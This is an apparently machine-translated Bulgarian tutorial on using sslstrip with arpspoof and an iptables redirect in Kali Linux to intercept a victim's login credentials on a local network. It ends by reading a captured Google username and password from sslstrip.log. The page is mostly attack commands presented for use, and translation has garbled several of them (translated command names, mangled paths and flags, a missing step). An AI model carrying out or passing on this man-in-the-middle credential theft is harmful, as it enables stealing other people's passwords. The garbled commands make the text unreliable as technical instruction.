Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,

sslstrip полезност улавя HTTP трафик от компютър в локалната мрежа и по този начин ни дава възможност да разберем пароли на всички сайтове. Как да използвате тази програма?

За да започнете, отворете терминален и стартирайте командния sslstrip -h да се научат всички опции за инструменти.

Преди да започнете работа с sslstrip което трябва да направим някакво действие

1. Необходимо е да се даде възможност на IP Forwarding

ехо "1"> / Proc / сис / нето / IPv4 / ip_forward

2. Активиране пренасочва заявките от пристанище 80-8080

IPTABLES -t NAT -А PREROUTING -p TCP -destination-порт 80 -j REDIRECT до-порт 8080

3. Определяне на нашия портал NETSTAT-NR

5. пренасочва всички HTTP трафик от нашия компютър към шлюза

arpspoof -i eth0 -t 192.168.71.128 -r 192.168.71.2

Сега, без да затваряте прозореца на терминала, се отвори друг, и то с подслушване порт 8080 работи със sslstrip:

sslstrip -l 8080

Сега, аз съм на компютъра на жертвата, отивам на имейла Google:

След като дойде по пощата на компютъра с терминален прозорец Кали Linux с работна sslstrip натиснете Ctrl + C за да отмените операцията. Цялата информация се съхранява във файл sslstrip.log

Нека да видим съдържанието на файла:

котка sslstrip.log - потребителско име и парола са обграден от червена рамка

Ето как всичко това работи, на добър час!